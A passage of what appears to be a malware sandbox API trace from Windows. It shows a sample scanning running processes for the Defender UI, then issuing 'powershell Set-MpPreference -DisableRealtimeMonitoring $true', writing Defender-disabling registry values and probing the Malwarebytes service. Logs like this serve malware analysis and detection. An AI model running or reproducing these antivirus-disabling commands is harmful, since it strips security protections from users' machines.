th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.319] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCui.exe") returned -1 [0128.319] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.320] lstrcmpiW (lpString1="System", lpString2="MSASCui.exe") returned 1 [0128.320] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.321] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCui.exe") returned 1 [0128.321] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.322] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0128.322] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.322] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCui.exe") returned 1 [0128.322] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.323] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0128.323] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.324] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCui.exe") returned 1 [0128.324] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.324] lstrcmpiW (lpString1="services.exe", lpString2="MSASCui.exe") returned 1 [0128.324] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.325] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCui.exe") returned -1 [0128.325] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.326] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCui.exe") returned -1 [0128.326] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.326] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.326] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.327] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.327] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.328] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.328] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.328] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.328] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.329] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.329] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.329] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCui.exe") returned -1 [0128.330] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.330] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.330] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.330] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.331] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.331] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCui.exe") returned -1 [0128.331] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.331] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCui.exe") returned -1 [0128.331] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.332] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCui.exe") returned 1 [0128.332] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.333] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0128.333] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.334] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.334] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0128.336] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCui.exe") returned 1 [0128.336] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0128.338] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCui.exe") returned 1 [0128.338] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.339] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCui.exe") returned 1 [0128.339] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.340] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0128.340] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_philadelphia.exe")) returned 1 [0128.341] lstrcmpiW (lpString1="cdt_philadelphia.exe", lpString2="MSASCui.exe") returned -1 [0128.341] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pipesemesteraccepted.exe")) returned 1 [0128.342] lstrcmpiW (lpString1="pipesemesteraccepted.exe", lpString2="MSASCui.exe") returned 1 [0128.342] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="midwest-prostate.exe")) returned 1 [0128.343] lstrcmpiW (lpString1="midwest-prostate.exe", lpString2="MSASCui.exe") returned -1 [0128.343] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="edmonton cell.exe")) returned 1 [0128.344] lstrcmpiW (lpString1="edmonton cell.exe", lpString2="MSASCui.exe") returned -1 [0128.344] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="approx_comparisons.exe")) returned 1 [0128.345] lstrcmpiW (lpString1="approx_comparisons.exe", lpString2="MSASCui.exe") returned -1 [0128.345] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="compliant.exe")) returned 1 [0128.346] lstrcmpiW (lpString1="compliant.exe", lpString2="MSASCui.exe") returned -1 [0128.346] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="memovisitorslover.exe")) returned 1 [0128.347] lstrcmpiW (lpString1="memovisitorslover.exe", lpString2="MSASCui.exe") returned -1 [0128.347] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fixes.exe")) returned 1 [0128.348] lstrcmpiW (lpString1="fixes.exe", lpString2="MSASCui.exe") returned -1 [0128.348] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="lower-newfoundland-checks.exe")) returned 1 [0128.349] lstrcmpiW (lpString1="lower-newfoundland-checks.exe", lpString2="MSASCui.exe") returned -1 [0128.349] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="practice sees.exe")) returned 1 [0128.350] lstrcmpiW (lpString1="practice sees.exe", lpString2="MSASCui.exe") returned 1 [0128.350] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mind.exe")) returned 1 [0128.401] lstrcmpiW (lpString1="mind.exe", lpString2="MSASCui.exe") returned -1 [0128.401] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos.exe")) returned 1 [0128.402] lstrcmpiW (lpString1="autos.exe", lpString2="MSASCui.exe") returned -1 [0128.402] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed spirit.exe")) returned 1 [0128.403] lstrcmpiW (lpString1="succeed spirit.exe", lpString2="MSASCui.exe") returned 1 [0128.403] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="joseph saskatchewan.exe")) returned 1 [0128.404] lstrcmpiW (lpString1="joseph saskatchewan.exe", lpString2="MSASCui.exe") returned -1 [0128.404] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="enrolled-lebanon.exe")) returned 1 [0128.405] lstrcmpiW (lpString1="enrolled-lebanon.exe", lpString2="MSASCui.exe") returned -1 [0128.405] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pay_adapter.exe")) returned 1 [0128.406] lstrcmpiW (lpString1="pay_adapter.exe", lpString2="MSASCui.exe") returned 1 [0128.406] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mod.exe")) returned 1 [0128.407] lstrcmpiW (lpString1="mod.exe", lpString2="MSASCui.exe") returned -1 [0128.407] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="completing-h.exe")) returned 1 [0128.408] lstrcmpiW (lpString1="completing-h.exe", lpString2="MSASCui.exe") returned -1 [0128.408] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="water granny.exe")) returned 1 [0128.409] lstrcmpiW (lpString1="water granny.exe", lpString2="MSASCui.exe") returned 1 [0128.409] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="somebody finder.exe")) returned 1 [0128.410] lstrcmpiW (lpString1="somebody finder.exe", lpString2="MSASCui.exe") returned 1 [0128.410] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pathology refrigerator horror.exe")) returned 1 [0128.411] lstrcmpiW (lpString1="pathology refrigerator horror.exe", lpString2="MSASCui.exe") returned 1 [0128.411] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="villagenodestrengths.exe")) returned 1 [0128.412] lstrcmpiW (lpString1="villagenodestrengths.exe", lpString2="MSASCui.exe") returned 1 [0128.412] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="luther.exe")) returned 1 [0128.413] lstrcmpiW (lpString1="luther.exe", lpString2="MSASCui.exe") returned -1 [0128.413] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0128.414] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCui.exe") returned 1 [0128.414] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.415] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.415] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0128.416] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCui.exe") returned 1 [0128.416] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.417] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCui.exe") returned 1 [0128.417] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.418] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0128.418] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.419] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0128.419] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0128.420] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1 [0128.420] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x900, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0128.421] lstrcmpiW (lpString1="powershell.exe", lpString2="MSASCui.exe") returned 1 [0128.421] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="fumezad.exe")) returned 1 [0128.422] lstrcmpiW (lpString1="fumezad.exe", lpString2="MSASCui.exe") returned -1 [0128.422] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.422] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0128.422] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.423] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0128.423] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x844, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0128.424] CloseHandle (hObject=0xec) returned 1 [0128.424] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18afa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18af94 | out: lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x18af94*(hProcess=0xe4, hThread=0xec, dwProcessId=0x318, dwThreadId=0x6a4)) returned 1 [0128.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x102, phkResult=0x18afec | out: phkResult=0x18afec*=0x0) returned 0x2 [0128.429] RegSetValueExW (hKey=0x0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x18afe8, cbData=0x4) returned 0x6 [0128.429] RegCloseKey (hKey=0x0) returned 0x6 [0128.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications", ulOptions=0x0, samDesired=0x102, phkResult=0x18afec | out: phkResult=0x18afec*=0x0) returned 0x2 [0128.429] RegSetValueExW (hKey=0x0, lpValueName="DisableNotifications", Reserved=0x0, dwType=0x4, lpData=0x18afe8, cbData=0x4) returned 0x6 [0128.429] RegCloseKey (hKey=0x0) returned 0x6 [0128.429] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x601fe8 [0128.429] OpenServiceW (hSCManager=0x601fe8, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0 [0128.430] CloseServiceHandle (hSCObject=0x601fe8) returned 1 [0128.430] OpenSCManagerW (lpMachineName=0x0, 